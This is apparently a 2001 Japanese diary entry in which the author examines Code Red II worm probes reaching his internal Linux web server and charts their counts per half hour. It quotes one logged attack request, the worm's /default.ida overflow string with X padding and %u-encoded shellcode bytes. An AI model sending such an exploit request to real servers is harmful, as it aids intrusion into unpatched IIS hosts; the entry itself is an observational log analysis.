昨日[2001-08-06]の Code Red II の様子を調べてみる。8 月 6 日 11 時
から、研究所に置いてある私のメインマシンへ攻撃が来るようになった
(Web サーバ立ち上げてるけど、IIS じゃないどころか、Linux なので、
もちろん害無し)。こんなリクエストが来てた。XXXXX の先がオーバーフ
ローする部分なんだろな。

10.??.???.?? - - [06/Aug/2001:11:11:43 +0900] "GET /default.ida?X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003
%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 293

リクエストの数を 30 分単位で集計してみた。ネットワークの不調は朝か
らだったから、13 時頃がピークだなんて、攻撃開始はずいぶん遅れてる。
攻撃総数も少ないなあ。まあ、社内からしかアクセスできないマシンだし、
あちこちからリンクされるわけじゃないからね。

11:00 xxxxx
11:30 xxxxxxxxxxxxxxx
12:00 xxxxxxxxxxx
12:30 xxxxxxxxxxxxxx
13:00 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
13:30 xxxxxxxx
14:30 x
16:30 x
17:00 xx
20:30 x